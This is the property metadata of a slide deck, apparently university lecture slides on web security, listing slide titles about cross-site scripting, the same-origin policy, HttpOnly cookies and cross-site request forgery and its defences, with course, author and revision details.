      <vt:lpstr>XMLHttpRequest Example</vt:lpstr>
      <vt:lpstr>XMLHttpRequest Example</vt:lpstr>
      <vt:lpstr>What is the X (Cross) S (Site) S (Scripting) Attack?</vt:lpstr>
      <vt:lpstr>Naïve Code Injection</vt:lpstr>
      <vt:lpstr>Same-Origin Policy: Blocking Naïve Code Injection</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>We Can’t Hijack Sessions via XMLHttpRequest</vt:lpstr>
      <vt:lpstr>Javascript Injection Attack</vt:lpstr>
      <vt:lpstr>Injection Example</vt:lpstr>
      <vt:lpstr>After the Injection, What Attackers Can Do?</vt:lpstr>
      <vt:lpstr>NOTE: The Example Facebook Attack Does not Work for Now</vt:lpstr>
      <vt:lpstr>NOTE: The Example Facebook Attack Does not Work for Now</vt:lpstr>
      <vt:lpstr>Now You Can Have Cookie How Can You Send that to the Attacker?</vt:lpstr>
      <vt:lpstr>HTML Document Has a URL that Browser Automatically Connects</vt:lpstr>
      <vt:lpstr>document.write()</vt:lpstr>
      <vt:lpstr>Same-Origin Policy Blocks XMLHttpReqeust but not &lt;img&gt; tags..</vt:lpstr>
      <vt:lpstr>Httponly Cookie</vt:lpstr>
      <vt:lpstr>Cookie Summary</vt:lpstr>
      <vt:lpstr>XSS Summary</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Remember the &lt;img&gt; tag</vt:lpstr>
      <vt:lpstr>CSRF Implications</vt:lpstr>
      <vt:lpstr>What Can Attackers Do?</vt:lpstr>
      <vt:lpstr>What Can Attackers Do?</vt:lpstr>
      <vt:lpstr>CSRF Attacks Requirements</vt:lpstr>
      <vt:lpstr>Manipulating Search Engine Result with CSRF attack</vt:lpstr>
      <vt:lpstr>Search Engines are Customizing Search Result Based on User’s activity</vt:lpstr>
      <vt:lpstr>What Attackers Can Do?</vt:lpstr>
      <vt:lpstr>Result (in 2013)</vt:lpstr>
      <vt:lpstr>Read paper for the details</vt:lpstr>
      <vt:lpstr>How Can We Defeat CSRF attack?</vt:lpstr>
      <vt:lpstr>How Can We Defeat CSRF attack?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CS444/544 Operating Systems II</dc:title>
  <dc:creator>Jang, Yeong Jin</dc:creator>
  <cp:lastModifiedBy>Jang, Yeong Jin</cp:lastModifiedBy>
  <cp:revision>101</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-24T00:44:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-03T22:49:40Z</dcterms:modified>
</cp:coreProperties>
</file>